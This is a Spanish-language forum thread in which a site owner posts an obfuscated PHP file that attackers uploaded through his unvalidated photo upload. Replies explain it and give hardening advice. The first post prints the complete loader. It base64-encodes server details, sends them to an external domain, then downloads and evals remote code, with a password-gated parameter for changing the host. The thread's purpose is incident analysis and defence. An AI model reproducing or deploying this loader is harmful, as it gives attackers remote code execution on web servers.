que significa este codigo php (codigo codificado) solo expertos

MoDoRrO · #1 (**permalink**) 12/11/2009, 21:49

Hola amigos, siempre he creado mis aplicaciones de UPLOAD
con el error de no comprobar la extencion de este...

es por ello, que algunas personas malas

aprovecharon el "Sube tu Foto!" para subir un .php

Código PHP:

  <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6eb96e259631ec3c51db602a9268d539") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

esto me encontre...

no me elimino (alrededor de 10mil fotos (incluyendo thumbs) ni otros archivos)

aunque no se si en realidad lo "ejecutaron"

en este momento desactive todos los uploads y estoy añadiendo la seguridad correspondiente.

pero... que significa el codigo que acabo de postear???

Gracias a todos

pateketrueke · #2 (**permalink**) 12/11/2009, 23:01

pues, mira... yo no soy experto, seguramente carga alguna dirección URL externa y ejecuta su contenido por lo que se ve...

Vun · #3 (**permalink**) 12/11/2009, 23:55

Aqui encontre algo sobre ese codigo:
http://forums.oscommerce.com/topic/3...d-please-help/

Parece que es un fallo de seguridad para ejecutar clicks en otras paginas, probablemente paga ganar pasta. No parece un bug critico en el que hayan averiguado tu pass, logicamente yo las cambiaria YA de todas formas!

Aqui aconsejan poner los CHMOD de las carpetas a 755 en vez de 777 (muy peligroso)
http://forums.digitalpoint.com/showthread.php?t=1316397

HackmanC · #4 (**permalink**) 13/11/2009, 00:26

Hola,

Cita:

Iniciado por MoDoRrO

aunque no se si en realidad lo "ejecutaron"
pero... que significa el codigo que acabo de postear???

El código envía cierta información de las variables del sistema a un sitio de internet, seguidamente ejecuta código 'arbitrario' (cualquier cosa) descargado del mismo dominio donde envió dicha información.

Cita:

Iniciado por Vun

... No parece un bug critico en el que hayan averiguado tu pass, ...

Si ejecutaron ese script podría haber sucedido cualquier cosa.

Para evitar postear direcciones y código aquí, descarga Notepad++ del sitio oficial, y usa tu imaginación para ver los base64_decode() usando TextFX -> TextFX Tools -> Base64Decode en Notepad++ en un nuevo documento. Por lo menos va a saber al dominio desde donde vino el script.

Saludos,

ps: Por cierto, no vayas a ejecutar el script por error.

MoDoRrO · #5 (**permalink**) 13/11/2009, 00:53

ok, primero muchas gracias por responder...

toda la semana hice respaldos diarios.

eh descargaod el archivo .php a mi PC

lo ejecute, pero no paso nada... obviamente lo ejecute en una pc externa a las de uso diario, ademas sin conexion a intenert para mas eguridad.

fui desencriptando linea por linea, y al parecer hace referencia a
http : / / 71. rssnews. ws/ (separo para no generar refer)

y segun mis conocimientos, el .php crea un archivo en la carpeta donde se ejecuta, pero no halle nada parecido....

aunque cabe destacar que no desencripte todo el codigo, ya que le perdi la pista por completo.

HackmanC · #6 (**permalink**) 13/11/2009, 01:12

Hola,

Cita:

Iniciado por MoDoRrO

... lo ejecute, pero no paso nada...

Por lo visto tú no tienes problema con ejecutarlo.
No creo que sea buena idea ejecutarlo para ver que pasa ... si no sabes que es lo que posiblemente va a realizar.

Cita:

Iniciado por MoDoRrO

... aunque cabe destacar que no desencripte todo el codigo, ya que le perdi la pista por completo.

Cita:

Iniciado por pateketrueke

... seguramente carga alguna dirección URL externa y ejecuta su contenido por lo que se ve...

Descarga el contenido para ejecutarlo, es decir, se conecta a la dirección que escribiste, le envía tus variables del servidor y seguidamente descarga código arbitrario y lo ejecuta. Pero bueno, ya sabes que significa ese código.

Saludos,

MoDoRrO · #7 (**permalink**) 14/11/2009, 00:30

asi es... jeje

logre desencriptar el codigo, y segui investigando

como se dijo anteriormente, el script generas u obliga al usuario a contribuir con un Adsense.

en este momento, todo el codigo fue eliminado, junto con otros .httacces encontrados

y la seguridad ya esta lista

HackmanC · #8 (**permalink**) 14/11/2009, 11:27

Cita:

Iniciado por MoDoRrO

... como se dijo anteriormente, el script generas u obliga al usuario a contribuir con un Adsense. ...

No me voy a meter a detalles pero realmente puede hacer cualquier cosa.

Es importante que lo comprendas para que no te vuelva a suceder. Decir que solo contribuye con Adsense es bastante absurdo si entendieras bien que es y como funciona ese script.

Una característica importante de todos los administradores de sistemas es que deberían conocer bien como funcionan estos caballos de troya, que pueden realizar cualquier actividad en tu servidor, inclusive usando exploits.

Yo me he dedicado a conocer todas esas cosas exactamente para eso, para que no me sucedan a mí en cualquier servidor o aplicación que hay realizado o vaya a realizar. Pero bueno, de igual forma yo hasta aquí puedo explicar para evitar malentendidos; de aquí en adelante tienes que investigar por tu cuenta.

Cita:

Iniciado por MoDoRrO

... y la seguridad ya esta lista ...

Es bueno saber que ya tienes todo bajo control, y te alentaría a que comprendas bien como funcionan esos errores de seguridad e investigues más para que no te vuelva a suceder en el futuro, en este caso posiblemente solo fue para Adsense.

Saludos.

MoDoRrO · #9 (**permalink**) 14/11/2009, 15:03

Gracias por tus consejos HackmanC

los tendre en cuenta para cualquier aplicacion futura y existente

Gracias

acoevil · #10 (**permalink**) 14/11/2009, 15:27

Y porque solo expertos ???, al decir esto la gente que sabe poco no entrara al tema, y la idea es que entren y pregunten si tienen alguna duda o no de lo que se habla ?.

Y si eres experto, entonces pa que pones este tema, si ya lo sabes

pateketrueke · #11 (**permalink**) 14/11/2009, 18:36

Cita:

Iniciado por acoevil

Y porque solo expertos ???, al decir esto la gente que sabe poco no entrara al tema, y la idea es que entren y pregunten si tienen alguna duda o no de lo que se habla ?.

Y si eres experto, entonces pa que pones este tema, si ya lo sabes

siii, la verdad... el que pone en sus temas "solo expertos" (si no saben, no se metan), etc, etc... es una falta de respeto...

cualquiera puede ayudar, primero, el foro es público... no solo para expertos, cualquier duda y su respuesta le sirve a todos...

sean expertos o no!!!

¿por que se atreven a hacer eso??

HackmanC · #12 (**permalink**) 14/11/2009, 21:42

Hola,

Solo para terminar con el tema, de mi parte,

Cita:

Iniciado por acoevil

... Y porque solo expertos ???, al decir esto la gente que sabe poco no entrara al tema, ...

Desde mi punto de vista, en este tema creo que es preferible de esa forma. Desde que vi el código me imaginé cuantos usuarios sin el conocimiento adecuado posiblemente podrían ponerse a jugar con ese código y solamente lograrían quedar infectados, o peor aún, pensar que es un simple juego. Igual pensé que este tema no debería estar aquí sino en el área de seguridad o algo así.

Cita:

Iniciado por pateketrueke

... ¿por que se atreven a hacer eso?? ...

Yo no me considero experto en el tema, y aún así le dí mi opinión al respecto, posiblemente olvidé mencionar eso

. El buen o mal uso de esos comentarios van a depender de la persona que los lea, y su habilidad para interpretarlos adecuadamente, así como su análisis posterior.

Pero bueno, solamente creí que era adecuado responder con el objetivo de aclarar la situación y no dejarlo desvanecerse en el aire. Yo al área de los foros sobre seguridad o virus casi nunca entro.

Saludos,